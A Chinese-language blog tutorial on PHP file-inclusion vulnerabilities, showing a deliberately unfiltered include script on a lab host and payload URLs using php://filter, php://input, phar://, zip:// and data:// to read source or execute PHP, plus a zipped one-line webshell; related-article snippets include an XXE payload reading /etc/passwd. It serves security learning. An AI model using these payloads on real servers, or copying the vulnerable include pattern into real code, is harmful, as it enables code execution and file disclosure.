文件包含漏洞(2), 伪协议, php://filter, php://input

最新推荐文章于 2024-07-17 10:20:55 发布
最新推荐文章于 2024-07-17 10:20:55 发布
阅读量274 收藏
点赞数
分类专栏: 渗透测试-web漏洞 文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bua200720411091/article/details/134031938
版权

伪协议利用

条件:

php.ini配置文件中 allow_url_fopen=On 是开启状态.

测试文件:
http://192.168.112.200/security/fileinc.php

<?php
$filename = $_GET['filename'];
// 或include_once, require, require_once
include $filename;    
echo "<hr>欢迎来到PHP的世界.<br>";
?>

GET方法的 filename 参数用户可控, 且没有对包含的文件进行过滤和限制.

1. php://filter

功能: 读取php脚本的内容并编码

文件包含php代码后, 会自动被web引擎解释执行, 如果想查看源码而不是执行, 则可以使用这个协议.
读取common.php的源码, 并用base64编码显示. 通过base64解码即可得到php代码.

http://192.168.112.200/security/fileinc.php?
filename=php://filter/read/convert.base64-encode/resource=common.php
2. php://input

功能: 将post提交的代码作为输入

条件: allow_url_include=On 已经开启

通过post提交代码来执行.

http://192.168.112.200/security/fileinc.php?filename=php://input

post data:

<?php phpinfo(); ?>
3. phar://

功能: phar用于对压缩文件的读取, 配合文件上传漏洞, 或phar反序列化漏洞.

把一句话木马文件压缩成zip格式, 上传到服务器(服务器没有限制zip上传).
通过该phar可以直接访问zip内的txt文件.

mm.txt -> mm.zip

http://192.168.112.200/security/fileinc.php?filename=phar://test/mm.zip/mm.txt
4. zip://

与phar功能相同, 但是不能读取包含多级目录的压缩包.

5. data://

与input功能类似, 但是发送GET请求.

http://192.168.112.200/security/fileinc.php?filename=data://text/plain,<?php phpinfo(); ?>

也可以发送base64编码后的代码

http://192.168.112.200/security/fileinc.php
?filename=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
DeltaTime
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fileclude(文件包含漏洞php://inputphp://filter的使用)
Welcome To Myon'Blog !
04-16 4227
fileclude、文件包含漏洞php://inputphp://filter、file_get_contents() 函数、empty()函数、isset函数、PHP伪协议
文件包含漏洞
qq_52016943的博客
08-17 2237
文件包含漏洞
iwebsec靶场文件包含漏洞-php://input伪协议及利用
qq_56041380的博客
04-05 623
php://input可以访问请求的原始数据的只读流,即可以直接读取POST上没有经过解析的原始数据,但是使用enctype="multipart/form-data"的时候php://input是无效的。
bugku never_give_up file_get_contents()有php://input漏洞 eregi \x00绕过
YouthBelief的博客
03-07 3013
bugku never_give_up0x00 never_give_up0x01 解题流程1.1查看首页 及源码1.2 访问1p.html1.3解码1.4 分析代码1.5 payload 0x00 never_give_up 0x01 解题流程 1.1查看首页 及源码 发现一个页面 访问 1.2 访问1p.html 自动跳转到主页 直接查看源码 得到JS代码 其中申明 words变量 和OutWord()方法 将 escape解码后的words变量写入页面中。 words 变量 经过 url编码
【网络安全篇】php伪协议-漏洞及其原理
qq_53058639的博客
01-29 799
🏆今日学习目标:🍀学习php伪协议✅创作者:贤鱼⏰预计时间:35分钟🍁贤鱼的个人社区,欢迎你的加入🍁如果有需要可以查看下面文章。
文件包含中过滤了php,文件包含漏洞---php协议
weixin_32480335的博客
03-21 684
一、原理1、概念:在php代码中,总会有一些代码我们会经常用到,这时引入了文件包含函数,可以通过文件包含函数把这些代码文件包含进来,直接使用文件中的代码,这样提高了我们的工作效率。2、文件包含函数:include():如果发生错误,会产生一个警告然后继续执行脚本include_once():与include()相同,如果文件之前被包含过则不再包含require():会停止执行代码require_o...
php伪协议漏洞_include(文件包含漏洞php伪协议)
weixin_39935257的博客
01-17 1078
点击tips查看元素,也并没有有用的信息,联想到题目,include想起了文件包含漏洞。构造payload?file=/../../../../../../flag.php没有返回东西。看完wq学到了一个新姿势:php伪代码构造payload?file=php://filter/read=convert.base64-encode/resource=flag.php使用 "php://filter...
浅谈php://filter的妙用
10-17
在XXE漏洞利用中,可以使用类似的方式,通过`php://filter`处理文件流,消除可能导致解析问题的特殊字符。 ### 巧妙利用编码与解码 编码和解码不仅可以帮助我们安全地读取文件,还可以用来规避一些限制。例如,...
php伪协议.zipphp伪协议.zip
02-24
在提到的“php伪协议.docx”文件中,可能包含了更详细的关于PHP伪协议的使用示例、历史背景,以及如何在受限环境中安全地使用这些机制的信息。这个文档可能涵盖了如何在不违反安全策略的情况下,利用PHP伪协议来实现...
信息安全技术:PHP伪协议.pptx
11-01
【信息安全技术:PHP伪协议】 在信息安全领域,理解并掌握编程语言中的安全机制至关重要,特别是对于Web开发常用的语言PHPPHP伪协议PHP中的一种特殊机制,它允许开发者通过特定的URL格式来访问和操作各种资源...
phpfilter函数验证、过滤用户输入的数据
12-19
PHP编程中,确保用户输入的安全性和有效性是至关重要的,因为不正确的用户输入可能会导致安全漏洞,例如SQL注入、跨站脚本攻击等。PHP提供了一套强大的过滤器(Filter)函数来帮助开发者验证和过滤来自非安全源的...
基于PHP的修补跨站脚本攻击漏洞php版源码.zip
12-30
跨站脚本(Cross-Site Scripting,简称XSS)是一种常见的网络安全漏洞,它允许攻击者在用户浏览器中注入恶意脚本,从而控制用户的会话、窃取敏感信息或者进行其他恶意行为。针对这种威胁,PHP开发者需要采取一系列...
文件包含漏洞(一)
不秃头的程序Yang
06-29 1440
二、常见文件包含函数 三、代码分析 四、利用方法 五、本地文件包含 1、文件包含/etc/passwd 3.2 搭建测试环境 3.3 抓包测试 文件包含图片 包含日志文件getshell 包含环境变量getshell
php input 漏洞,php://inputphp://filter,data URI schema的那些事
weixin_36400833的博客
03-11 1648
一、php://input一句话木马在调研dedecms的历史漏洞时,发现了dedecms安装文件曾经出过被植入后门的漏洞(SSV-ID站点include目录下shopcar.class.php文件被植入一句话木马)@eval(file_get_contents('php://input'))我是个十足的php菜鸟,只有用到的时候才会去查查语法书,对php://input也只是有点印象而已,于是用...
php伪协议语法,php文件包含漏洞inputfilter
weixin_39881167的博客
03-10 1641
php://inputphp://input可以读取没有处理过的POST数据。相较于$HTTP_RAW_POST_DATA而言,它给内存带来的压力较小,并且不需要特殊的php.ini设置。php://input不能用于enctype=multipart/form-data。php://filter协议协议语法:php://filter:/=php://filter 的 参数列表read      ...
文件包含漏洞inputfilter、zip)
m0_70349048的博客
03-17 1247
可以访问请求的原始数据的只读流,将请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。从而导致任意代码执行。先访问这个页面然后抓包进行上传并访问恶意代码,可以看到phpinfo()已经执行。
PHP环境 XML外部实体注入漏洞(XXE)
EC_Carrot的博客
07-19 971
漏洞简介 libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡,这里用libxml2.8.0版本编译进PHP中来复现。 漏洞复现 Simple XXE Payload: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <root> &lt
【网络安全篇】php文件包含漏洞
贤鱼的博客
10-13 1661
php文件包含漏洞--思路+例题讲解
华为HCIP Datacom H12-821 卷42
最新发布
QIN_yuexiang的博客
07-17 146
转换的第一步将FFFE插入MAC地址的公司标识和扩展标识符之间,第二步将从高位数,第7位的0改为1,1改为0。这种由MAC地址产生IPv6地址接口标识的方法可以减少配置的工作量,尤其是当采用无状态地址自动配置时,只需要获取一个IPv6前缀就可以与接口标识形成IPv6地址。已知某接口的MAC地址为OA-04-3B-45-1A-03,那么根据IEEE EUI-64规范生成的接口ID标识为:___-___-___-___-___-___-1A-03。数据链路层——ARP欺骗 网络层—Smurf攻击;
php://input伪协议详解
07-30
引用[1]中提到,php://input是一种伪协议,用于从请求的主体中获取原始数据。然而,根据引用[1]的描述,如果服务器的allow_url_include设置为off,则无法使用php://input伪协议。这意味着无法通过该伪协议来执行任意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值